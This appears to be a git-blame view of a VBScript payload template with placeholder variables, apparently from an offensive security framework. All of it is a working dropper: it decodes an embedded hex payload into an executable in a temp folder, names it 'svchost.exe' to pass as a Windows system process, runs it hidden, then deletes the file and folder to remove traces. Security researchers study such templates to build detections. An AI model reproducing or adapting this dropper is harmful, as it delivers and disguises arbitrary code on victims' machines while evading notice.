2013-08-20 23:52:58 +00:00
|
|
|
Function %{var_func}()
|
2013-10-18 17:59:30 +00:00
|
|
|
%{var_shellcode} = "%{var_hex_shellcode}"
|
2013-08-20 23:52:58 +00:00
|
|
|
|
|
|
|
Dim %{var_obj}
|
|
|
|
Set %{var_obj} = CreateObject("Scripting.FileSystemObject")
|
|
|
|
Dim %{var_stream}
|
|
|
|
Dim %{var_tempdir}
|
|
|
|
Dim %{var_tempexe}
|
|
|
|
Dim %{var_basedir}
|
|
|
|
Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2)
|
|
|
|
%{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName()
|
|
|
|
%{var_obj}.CreateFolder(%{var_basedir})
|
|
|
|
%{var_tempexe} = %{var_basedir} & "\" & "svchost.exe"
|
|
|
|
Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempexe}, true , false)
|
2013-10-18 17:59:30 +00:00
|
|
|
For i = 1 to Len(%{var_shellcode}) Step 2
|
|
|
|
%{var_stream}.Write Chr(CLng("&H" & Mid(%{var_shellcode},i,2)))
|
|
|
|
Next
|
2013-08-20 23:52:58 +00:00
|
|
|
%{var_stream}.Close
|
|
|
|
Dim %{var_shell}
|
|
|
|
Set %{var_shell} = CreateObject("Wscript.Shell")
|
|
|
|
%{var_shell}.run %{var_tempexe}, 0, true
|
|
|
|
%{var_obj}.DeleteFile(%{var_tempexe})
|
|
|
|
%{var_obj}.DeleteFolder(%{var_basedir})
|
|
|
|
End Function
|
|
|
|
|
|
|
|
%{init}
|